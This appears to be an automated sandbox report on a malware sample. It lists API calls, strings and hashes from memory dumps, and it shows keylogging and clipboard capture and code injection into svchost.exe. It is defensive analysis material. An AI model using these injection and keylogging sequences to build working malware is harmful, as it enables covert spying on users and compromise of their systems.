Part of subcall function 02F01280: DeleteCriticalSection.KERNEL32(00000000,00000000,02F17DF8,?,?,02F06541), ref: 02F012A1

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: e7f65706ad2666b55f751d4c9b7f3ceb2c9dc7ca493e49bdbde77ae69186fd26
Instruction ID: a7a5c1ab6ab5b641e900409f3f244a6835f69731ac8ea8d038ab9f5a27049411
Opcode Fuzzy Hash: e7f65706ad2666b55f751d4c9b7f3ceb2c9dc7ca493e49bdbde77ae69186fd26
Instruction Fuzzy Hash: D1017AF0A00B448FC7309F6A9884A17FAF8BF98750B504A1EE2DAC6B50D370A155DF95

Function 03D99020 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,03D98AA0,00000000,00000000,00000000), ref: 03D9903B
WaitForSingleObject.KERNEL32(00000000,000000FF,?,03D9C7BB,?,?,?,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03D99049

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 947d269484a7851847ae9a97c93db37cc285974956c2bb3135a8fab1b4e9b179
Instruction ID: 576a0c745123a9460339d1db380bee76f338cac374f6404c5742da4442732f50
Opcode Fuzzy Hash: 947d269484a7851847ae9a97c93db37cc285974956c2bb3135a8fab1b4e9b179
Instruction Fuzzy Hash: 97E05BB3554306FFEF50EB64DC84D76335CD304B307104516B924D6345F638E8548620

Function 03D9AE4E Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03D9AE5A

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

Part of subcall function 03D9AE2F: __getptd_noexit.LIBCMT ref: 03D9AE34
Part of subcall function 03D9AE2F: __freeptd.LIBCMT ref: 03D9AE3E
Part of subcall function 03D9AE2F: ExitThread.KERNEL32 ref: 03D9AE47

__XcptFilter.LIBCMT ref: 03D9AE7B

Part of subcall function 03DA2D77: __getptd_noexit.LIBCMT ref: 03DA2D7D

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: e8ac5abacc7f945d1dd86f4dafc0092f8a555a54ad0a62188545525c1c5ede3b
Instruction ID: 82d51056f4d2ea27a0c1cb425da514b9d96aa70a13e3ae9f596ba66a0d462ede
Opcode Fuzzy Hash: e8ac5abacc7f945d1dd86f4dafc0092f8a555a54ad0a62188545525c1c5ede3b
Instruction Fuzzy Hash: 2AE0ECB9A01B009FEB18FBA5C945E6D7775EF48701F200449E1026F2B1CB7599409B31

Function 02F07285 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02F07291

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

Part of subcall function 02F07266: __getptd_noexit.LIBCMT ref: 02F0726B
Part of subcall function 02F07266: __freeptd.LIBCMT ref: 02F07275
Part of subcall function 02F07266: ExitThread.KERNEL32 ref: 02F0727E

__XcptFilter.LIBCMT ref: 02F072B2

Part of subcall function 02F09D10: __getptd_noexit.LIBCMT ref: 02F09D16

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: 88252a324ec3bb2cd0ef0b6a85075b13ae89b4a503435f98ed6e522b8894210c
Instruction ID: 5656e9369dc83c9dc108465013f011d163c49072bbe36873a92e461a8358561c
Opcode Fuzzy Hash: 88252a324ec3bb2cd0ef0b6a85075b13ae89b4a503435f98ed6e522b8894210c
Instruction Fuzzy Hash: 3BE0E6719456019FE708BBE0CD85E6E7766DF44751F200049E2025B2E1DB75A940EF20

Function 03DA506E Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 03DA5086

Part of subcall function 03DA8DA3: __mtinitlocknum.LIBCMT ref: 03DA8DB9
Part of subcall function 03DA8DA3: __amsg_exit.LIBCMT ref: 03DA8DC5
Part of subcall function 03DA8DA3: EnterCriticalSection.KERNEL32(00000000,00000000,?,03DA2AF0,0000000D,03DB7788,00000008,03DA2BE7,00000000,?,03D9C743,00000000,03DB7688,00000008,03D9C7A8,?), ref: 03DA8DCD

__tzset_nolock.LIBCMT ref: 03DA5097

Part of subcall function 03DA498D: __lock.LIBCMT ref: 03DA49AF
Part of subcall function 03DA498D: ____lc_codepage_func.LIBCMT ref: 03DA49F6
Part of subcall function 03DA498D: __getenv_helper_nolock.LIBCMT ref: 03DA4A18
Part of subcall function 03DA498D: _free.LIBCMT ref: 03DA4A4F
Part of subcall function 03DA498D: _strlen.LIBCMT ref: 03DA4A56
Part of subcall function 03DA498D: __malloc_crt.LIBCMT ref: 03DA4A5D
Part of subcall function 03DA498D: _strlen.LIBCMT ref: 03DA4A73
Part of subcall function 03DA498D: _strcpy_s.LIBCMT ref: 03DA4A81
Part of subcall function 03DA498D: __invoke_watson.LIBCMT ref: 03DA4A96
Part of subcall function 03DA498D: _free.LIBCMT ref: 03DA4AA5

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 17c2828a4662435a479b32d56b238d564766cb3c10a4401c2205485ca37546b1
Instruction ID: 5d718e1bb492ca5001dd9494a1576d9ab654256ccb90addfcf28b9d5b7db5e76
Opcode Fuzzy Hash: 17c2828a4662435a479b32d56b238d564766cb3c10a4401c2205485ca37546b1
Instruction Fuzzy Hash: 2CE0CD79461F13DECE35FBAD6B0011CB772FB44B11F100A55A19059684C5B00650E6F1

Function 03D883BC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80000001,03D8839A), ref: 03D883C9
RegCloseKey.ADVAPI32(75BF73E0), ref: 03D883D2

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 45994b81f824df9d3e21d87f51feed482e8a44122fc2a74ebdbf1daaacc7d866
Instruction ID: 71814a7bc1da5855af54a1ee965f5b1a155f1e4eb88907b6425b49afe7bcdfac
Opcode Fuzzy Hash: 45994b81f824df9d3e21d87f51feed482e8a44122fc2a74ebdbf1daaacc7d866
Instruction Fuzzy Hash: 3DC04C73D0102897CA10E6A4ED4494977B85B4C210F1144C2A104A3114D634AD418F90

Function 03D81060 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 03D8108A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 13a90dcbc440d4da213993f1286325492aa12719f165810e23802ef010de9e6b
Instruction ID: 6b63f5b952fe45f72eb9f173b3259a20116267195b8c9aa08362bf7c69f84576
Opcode Fuzzy Hash: 13a90dcbc440d4da213993f1286325492aa12719f165810e23802ef010de9e6b
Instruction Fuzzy Hash: 0711B2767042469FC718DF2FD8809AAB7E9EF84360B14C52AE85AC7251D631F85687A0

Function 6C3E05AB Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C3D7AD5,?,?,00000000,00000000,00000000,?,6C3D9117,00000001,00000214,?,6C3D7A8B), ref: 6C3E05EE

Part of subcall function 6C3D6FBC: __getptd_noexit.LIBCMT ref: 6C3D6FBC

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 3aaf4dbf0f0e0c52a131488790f8593114411c020b2c33a89f6c668d6ee15844
Instruction ID: f2e5cb509ccad5d5acb3d1e6629f697ac23fcae92046eae5eb640f21005c064d
Opcode Fuzzy Hash: 3aaf4dbf0f0e0c52a131488790f8593114411c020b2c33a89f6c668d6ee15844
Instruction Fuzzy Hash: 7201B531305275DBEB159E25D814B573368EB85368F11462BE86ADA9C0DF75D800DF50

Function 6C3D24FA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 6C3D2507

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 9f7d75bb4620f9ede3c61bfc6b9615d730aee0f230587228abdf798aff93f430
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0FC09B7354110C77CF111A42DC05E563F199BC0664F454010FF1C195609673ED659985

Non-executed Functions

Function 03D993F0 Relevance: 73.8, APIs: 37, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D99449
Sleep.KERNEL32(00000001,?,?,?,03D8687D), ref: 03D99453
GetTickCount.KERNEL32 ref: 03D9945F
GetTickCount.KERNEL32 ref: 03D99472
InterlockedExchange.KERNEL32(03DC4338,00000000), ref: 03D9947A
OpenClipboard.USER32(00000000), ref: 03D99482
GetClipboardData.USER32(0000000D), ref: 03D9948A
GlobalSize.KERNEL32(00000000), ref: 03D9949B
GlobalLock.KERNEL32(00000000), ref: 03D994AC
_memmove.LIBCMT ref: 03D99510
wsprintfW.USER32 ref: 03D99525
_memset.LIBCMT ref: 03D99543
GlobalUnlock.KERNEL32(00000000), ref: 03D9954C
CloseClipboard.USER32 ref: 03D99552
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D9956A
CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03D99584
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D995A2
lstrlenW.KERNEL32(03DB6880,?,00000000), ref: 03D995B6
WriteFile.KERNEL32(00000000,03DB6880,00000000), ref: 03D995C5
CloseHandle.KERNEL32(00000000), ref: 03D995CC
ReleaseMutex.KERNEL32(?), ref: 03D995D8
GetKeyState.USER32(00000014), ref: 03D9965C
lstrlenW.KERNEL32(03DBD7E0), ref: 03D996AB
wsprintfW.USER32 ref: 03D996BD
lstrlenW.KERNEL32(03DBD808), ref: 03D996DE
lstrlenW.KERNEL32(03DBD808), ref: 03D99701
wsprintfW.USER32 ref: 03D9971F
wsprintfW.USER32 ref: 03D99735
wsprintfW.USER32 ref: 03D9975F
lstrlenW.KERNEL32(00000000), ref: 03D997AB
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D997C1
CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03D997DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D997F9
lstrlenW.KERNEL32(00000000,?,00000000), ref: 03D99809
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 03D99814
CloseHandle.KERNEL32(00000000), ref: 03D9981B
ReleaseMutex.KERNEL32(?), ref: 03D99828

Strings

%s%s, xrefs: 03D996B7, 03D99719
%s%s, xrefs: 03D99759
%s%s, xrefs: 03D9972F
[, xrefs: 03D9951F
[esc], xrefs: 03D996EE, 03D99717, 03D9972D, 03D99757

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock_memmove
String ID: [$%s%s$%s%s$%s%s$[esc]
API String ID: 3314438383-2373594894
Opcode ID: 05d1e500b508bafe074cc5764428aa9faf5376ca7f8820f6f1b23278ab04a3dc
Instruction ID: fdf5c565ecdb66a0cfd45d20453373e3719184c2f6d6f143e79b42ed2796379c
Opcode Fuzzy Hash: 05d1e500b508bafe074cc5764428aa9faf5376ca7f8820f6f1b23278ab04a3dc
Instruction Fuzzy Hash: 71C1C276510301EFEB20EF64DC99B9A77B8FB08B00F048A5DE15A96394EB749584CF61

Function 03D88CE0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D88D04
_memset.LIBCMT ref: 03D88D50
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03D88D64

Part of subcall function 03D8B270: _vswprintf_s.LIBCMT ref: 03D8B281

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88D93
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 03D88DDA

Part of subcall function 03D88C40: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03D88DFC), ref: 03D88C56
Part of subcall function 03D88C40: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03D88DFC,?,?,?,?,?,?,74DF0630), ref: 03D88C5D

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E0A
_memset.LIBCMT ref: 03D88E23
LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E3B
GetProcAddress.KERNEL32(00000000), ref: 03D88E44
LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E56
GetProcAddress.KERNEL32(00000000), ref: 03D88E59
LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E6B
GetProcAddress.KERNEL32(00000000), ref: 03D88E6E
LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E80
GetProcAddress.KERNEL32(00000000), ref: 03D88E83
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E8B
GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E92
_memset.LIBCMT ref: 03D88EB4
GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88ECA
VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 03D88EFF
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03D88F1B
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03D88F43
VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03D88F58
WriteProcessMemory.KERNEL32(00000000,00000000,03D88BF0,00001000,00000000), ref: 03D88F72
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03D88F90
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03D88FA1
Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88FBA
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03D88FD6
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03D88FE8
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88FF1

Strings

Kernel32.dll, xrefs: 03D88E36, 03D88E4B, 03D88E60, 03D88E75
D, xrefs: 03D88D40
OpenProcess, xrefs: 03D88E31
Windows\System32\svchost.exe, xrefs: 03D88DA4
WinExec, xrefs: 03D88E5B
ExitProcess, xrefs: 03D88E46
%s%s, xrefs: 03D88D76, 03D88DAA
WaitForSingleObject, xrefs: 03D88E70
Windows\SysWOW64\svchost.exe, xrefs: 03D88D70

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 4176418925-3213446972
Opcode ID: 7e856e1ddbe19c0daf374460f79b19c56dd075b168b433bf3bb4498d4a1f9475
Instruction ID: 7853e2d02c8120685f5dfafac8677071f367595c218e05111daf708b6a056d79
Opcode Fuzzy Hash: 7e856e1ddbe19c0daf374460f79b19c56dd075b168b433bf3bb4498d4a1f9475
Instruction Fuzzy Hash: 7D81CA72A40318FBE721EB65DC45FDF777CDF95B00F000499F249A6181EAB4AB858B64

Function 6C36387C Relevance: 40.7, APIs: 11, Strings: 12, Instructions: 442COMMON

Download Yara Rule

APIs

Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19

_sprintf.LIBCMT ref: 6C363A79

Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF

_sprintf.LIBCMT ref: 6C363AB3
_sprintf.LIBCMT ref: 6C363B0F
_sprintf.LIBCMT ref: 6C363B6C
_sprintf.LIBCMT ref: 6C363BEE

Part of subcall function 6C3714FC: _fprintf.LIBCMT ref: 6C3715E2
Part of subcall function 6C3714FC: SetWindowExtEx.GDI32(00000000,00000000,00000000), ref: 6C3716FC
Part of subcall function 6C3714FC: SetBkMode.GDI32(00000001), ref: 6C37170A
Part of subcall function 6C3714FC: SelectObject.GDI32(?,00000000), ref: 6C37171C

Part of subcall function 6C371AD3: _sprintf.LIBCMT ref: 6C371B63

_sprintf.LIBCMT ref: 6C363CB6
_sprintf.LIBCMT ref: 6C363C4B

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

Part of subcall function 6C3714FC: _fputc.LIBCMT ref: 6C37163A

_sprintf.LIBCMT ref: 6C363CF9
_sprintf.LIBCMT ref: 6C363DC6
_sprintf.LIBCMT ref: 6C363E66

Part of subcall function 6C3D1F84: __flsbuf.LIBCMT ref: 6C3D1FFA

_sprintf.LIBCMT ref: 6C363ED4

Strings

%s, xrefs: 6C363BE2
H;GlY, xrefs: 6C363A46
%2d, xrefs: 6C363AAD
%4d%s %s, xrefs: 6C363C45
Total RSHXY RSHXY%7.1f 100.0%%, xrefs: 6C363CF3
%d:%7d%7.1f (%d) /%5.1f%% %c%6.2f%7.1f (%d) /%5.1f%%, xrefs: 6C363E60
Ray Count Power Rank Perc. %c Slice Power Rank Perc., xrefs: 6C363DC0
Body Location Rulers House Rulers Power Rank Percent, xrefs: 6C363A32
%.3s , xrefs: 6C363B09
%6.1f (%2d) /%5.1f%%, xrefs: 6C363CB0
Tot:%5d%7.1f 100.0%% %c%6.2f%7.1f 100.0%%, xrefs: 6C363ECE
%-4.4s, xrefs: 6C363A73

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$CapsDeviceModePageTextViewportWindow$ColorObjectSelectStart__flsbuf__output_l_fprintf_fputc
String ID: %s$%-4.4s$%.3s $%2d$%4d%s %s$%6.1f (%2d) /%5.1f%%$%d:%7d%7.1f (%d) /%5.1f%% %c%6.2f%7.1f (%d) /%5.1f%%$Body Location Rulers House Rulers Power Rank Percent$H;GlY$Ray Count Power Rank Perc. %c Slice Power Rank Perc.$Tot:%5d%7.1f 100.0%% %c%6.2f%7.1f 100.0%%$Total RSHXY RSHXY%7.1f 100.0%%
API String ID: 3459736133-1418402959
Opcode ID: a7cf4b44a5870a46478de8e6478524564ea00870b6031426c12d0be79fec43b6
Instruction ID: 7cba86010c149cc5dba98791e2680cb15b9ea4cce94458321441f129feaff250
Opcode Fuzzy Hash: a7cf4b44a5870a46478de8e6478524564ea00870b6031426c12d0be79fec43b6
Instruction Fuzzy Hash: A20233B2A001588BDB20EFA4DC45FEDB774EF45308F0104E9D089A7A95DB358DA8CF56

Function 02F05810 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02F05839
_memset.LIBCMT ref: 02F05858
_memset.LIBCMT ref: 02F0588D
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02F058A1

Part of subcall function 02F059D0: _vswprintf_s.LIBCMT ref: 02F059E1

GetFileAttributesA.KERNEL32(?), ref: 02F058D0
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02F05918
VirtualAllocEx.KERNEL32(?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F0593E
WriteProcessMemory.KERNEL32(?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05958
GetThreadContext.KERNEL32(?,?,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05977
